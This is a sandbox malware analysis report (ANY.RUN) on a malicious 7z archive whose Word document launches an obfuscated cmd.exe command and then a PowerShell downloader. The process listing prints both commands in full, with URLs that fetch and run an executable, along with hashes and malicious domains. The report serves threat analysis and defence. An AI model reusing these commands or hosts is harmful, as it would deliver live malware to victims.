analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Acuerdo[193].7z

Full analysis: https://app.any.run/tasks/1561cde6-3206-4b3f-8811-2df39d11bdf8
Verdict: Malicious activity
Analysis date: April 15, 2019, 12:59:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-7z-compressed
File info: 7-zip archive data, version 0.4
MD5:

16683FC7DCDB248B50776269F1810C31

SHA1:

37647707061115EE848E8ABCE6E0423E90C4F027

SHA256:

DCA2C00C253F3D83057454D1817C3F963D33738F46887B348354FD0F61758867

SSDEEP:

768:yFCHtUO25fpBcWZMEvX8IGVIFywkzrQ43STF9d5gyLYraMUMzQ:yYHtUO25fvFMEvXlG+Fqz8Fb5jLYraPx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes PowerShell scripts

      • CMd.exe (PID: 3664)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2596)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2596)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WinRAR.exe (PID: 2556)

    • Creates files in the user directory

      • powershell.exe (PID: 2188)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2596)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2596)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.7z | 7-Zip compressed archive (v0.4) (57.1)
.7z | 7-Zip compressed archive (gen) (42.8)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2556"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Acuerdo[193].7z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2596"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIa2556.18726\Acuerdo[193].doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3664CMd /V^:^ON/C"^s^e^t ^x^I=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^a^er^b^;^HV^j^$^ ^m^e^t^I^-^ek^ovn^I;)^HV^j$^ ^,N^w^i^$(^e^li^F^d^a^o^lnw^o^D^.^Z^Q^t^$^{^yr^t^{)n^W^j^$^ n^i^ N^w^i^$(hc^a^ero^f^;^'^e^x^e^.^'^+NN^j^$^+^'^\^'^+c^i^lb^u^p^:vn^e^$=HVj^$^;'^7^2^4^'^ ^=^ NN^j^$^;)^'^@^'(^t^i^l^p^S^.^'x^O^Zx^M^LC^U^JR/^s^d^a^o^l^p^u/^tn^e^tn^oc^-^p^w/^d^i^.c^a^.^a^h^s^k^i^dn^u^.^a^s^a^kr^e^p//^:^p^t^t^h^@^7^9^H^2^P^x^J^Q^H^s/^m^oc^.^o^m^h^sa^m^l^a^p^s^a^l^l^e^t^o^h//^:p^t^t^h^@Ru^oN^z^a^6^Jc/^k^u.^oc^.^d^t^l^s^s^a^am-^w//^:^p^t^t^h^@^0^G^b^4^Q^b^Z^0^g/^b^u^p^.e^l^i^a//^:^p^t^t^h^@^f^f^P^A^X^o^f/^m^oc^.^s^s^a^l^g^l^j//^:^p^t^t^h^'=n^Wj^$^;^tn^e^i^lC^b^e^W^.^t^eN^ ^tc^e^j^bo^-^wen^=^Z^Q^t^$^ ^l^l^e^h^sr^e^wo^p&&^f^or /^L %R ^in (^3^9^6^;^-^1^;^0)^d^o ^s^e^t ^W^D^E=!^W^D^E!!^x^I:~%R,1!&&^i^f %R ^e^q^u ^0 c^a^l^l %^W^D^E:^*^WD^E^!^=%"C:\Windows\system32\CMd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2188powershell $tQZ=new-object Net.WebClient;$jWn='http://jlglass.com/foXAPff@http://aile.pub/g0ZbQ4bG0@http://w-maassltd.co.uk/cJ6azNouR@http://hotellaspalmashmo.com/sHQJxP2H97@http://perkasa.undiksha.ac.id/wp-content/uploads/RJUCLMxZOx'.Split('@');$jNN = '427';$jVH=$env:public+'\'+$jNN+'.exe';foreach($iwN in $jWn){try{$tQZ.DownloadFile($iwN, $jVH);Invoke-Item $jVH;break;}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 734
Read events
1 330
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2596WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR84A3.tmp.cvr
MD5:
SHA256:
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1O9L4SSF6F6PACC23TZM.temp
MD5:
SHA256:
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF109145.TMPbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2596WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:0C8F084DEB9418CE76D1BAC640F08C9C
SHA256:E6ABF50F4492307D7D79F8AAC932F06CDE3CED76DAFAB14C65B7F292DC573C48
2188powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:16D0FD6E07266B2C15A9D7BC6623F506
SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B
2556WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa2556.18726\Acuerdo[193].docdocument
MD5:3D756EA278A0D95D7013DE4494B609E0
SHA256:64F1BD33C46FD7AF94103AFAFA4FD6C19EC8CFFDFA98AAD4EBC1124EBB08E106
2596WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Rar$DIa2556.18726\~$uerdo[193].docpgc
MD5:A14BD452BA2198B69044BFD477515EA7
SHA256:A99CD1D956F04BB3923D68E2FF92EF555EC8C1FB9BA356E421F27ABD23BA1529
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2188
powershell.exe
GET
114.215.110.139:80
http://aile.pub/g0ZbQ4bG0
CN
malicious
2188
powershell.exe
GET
404
184.106.55.25:80
http://jlglass.com/foXAPff
US
html
270 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
114.215.110.139:80
aile.pub
Hangzhou Alibaba Advertising Co.,Ltd.
CN
malicious
184.106.55.25:80
jlglass.com
Liquid Web, L.L.C
US
malicious

DNS requests

Domain
IP
Reputation
jlglass.com
  • 184.106.55.25
malicious
aile.pub
  • 114.215.110.139
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Acuerdo[193].7z